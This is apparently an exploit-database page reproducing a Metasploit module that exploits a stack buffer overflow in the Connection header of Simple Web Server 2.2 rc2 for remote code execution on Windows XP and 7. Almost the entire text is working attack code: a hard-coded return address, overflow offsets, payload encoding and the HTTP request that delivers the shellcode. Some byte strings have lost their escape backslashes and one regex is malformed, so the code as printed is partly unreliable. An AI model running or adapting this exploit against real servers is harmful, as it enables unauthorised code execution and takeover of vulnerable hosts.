Simple Web Server Connection Header Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Simple Web Server Connection Header Buffer Overflow
# Published : 2012-07-23
# Author :
# Previous Title : Zenoss 3 showDaemonXMLConfig Command Execution
# Next Title : Microsoft Internet Explorer Fixed Table Col Span Heap Overflow

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	HttpFingerprint = { :pattern => [ /PMSoftware-SWS/ ] }

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			'Name'        => "Simple Web Server Connection Header Buffer Overflow",
			'Description' => %q{
				This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user
				can send a long string data in the Connection Header to causes an overflow on the
				stack when function vsprintf() is used, and gain arbitrary code execution. The
				module has been tested successfully on Windows 7 SP1 and Windows XP SP3.
			},
			'License'	  => MSF_LICENSE,
			'Author'      =>
				[
					'mr.pr0n', # Vulnerability Discovery and PoC
					'juan' # Metasploit module
				],
			'References' =>
				[
					['EDB', '19937'],
					['URL', 'http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/']
				],
			'Payload'	 =>
				{
					'BadChars' => "x00x0ax0d",
					'Space' => 2048,
					'DisableNops' => true,
					'PrependEncoder' => "x81xC4x60xF0xFFxFF", # add esp, -4000
				},
			'DefaultOptions' =>
				{
					'EXITFUNC' => "process",
				},
			'Platform' => 'win',
			'Targets'  =>
				[
					[
						'SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1',
						{
							'Ret' => 0x6fcbc64b, # call edi from libstdc++-6.dll
							'Offset' => 2048,
							'OffsetEDI' => 84
						}
					]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Jul 20 2012",
			'DefaultTarget'  => 0))
	end

	def check
		res = send_request_raw({'uri'=>'/'})
		if res and res.headers['Server'] =~ /PMSoftware-SWS/2.[0-2]/
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def exploit

		sploit = payload.encoded
		sploit << rand_text(target['Offset'] - sploit.length)
		sploit << [target.ret].pack("V") # eip
		sploit << rand_text(target['OffsetEDI'])
		sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{sploit.length}").encode_string

		print_status("Trying target #{target.name}...")

		connect

		send_request_cgi({
			'uri'        => '/',
			'version'    => '1.1',
			'method'     => 'GET',
			'connection' => sploit
		})

		disconnect

	end
end